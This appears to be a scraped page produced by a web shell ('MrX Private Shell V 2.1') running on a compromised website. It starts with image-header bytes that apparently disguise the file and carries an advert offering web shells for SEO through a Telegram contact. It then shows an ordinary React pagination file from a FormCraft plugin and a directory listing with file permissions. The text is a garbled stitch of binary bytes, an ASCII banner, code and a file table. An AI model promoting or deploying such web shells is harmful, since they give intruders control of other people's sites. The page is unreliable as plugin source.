����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
let React = window.React
let ReactDOM = window.ReactDOM
let moment = window.moment
let createReactClass = require('create-react-class')
import Header from './Header.js'
import Helpers from './Helpers.js'
let Pagination = createReactClass({
render: function() {
return (
<div className='pagination-cover'>
<div className='pagination'>
<div style={{ left: '0px' }}>
{[...Array(this.props.pages)].map((x, index) => {
return (
<span key={index} className={ index + 1 === this.props.page ? 'active' : '' } onClick={this.props.updatePage.bind(null, index + 1)}>
{index + 1}
</span>
)
})}
</div>
</div>
</div>
)
}
})
module.exports = Pagination
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| data | Folder | 0755 |
|
|
| Header.js | File | 1.39 KB | 0644 |
|
| Helpers.js | File | 4.01 KB | 0644 |
|
| Pagination.js | File | 696 B | 0644 |
|
| formcraft-admin.js | File | 6.94 KB | 0644 |
|
| formcraft-builder.js | File | 92.98 KB | 0644 |
|
| formcraft-dashboard.js | File | 26.07 KB | 0644 |
|
| formcraft-entries.js | File | 17.95 KB | 0644 |
|
| formcraft-insights.js | File | 9.95 KB | 0644 |
|
| formcraft-license.js | File | 5.18 KB | 0644 |
|
| formcraft-uploads.js | File | 7.78 KB | 0644 |
|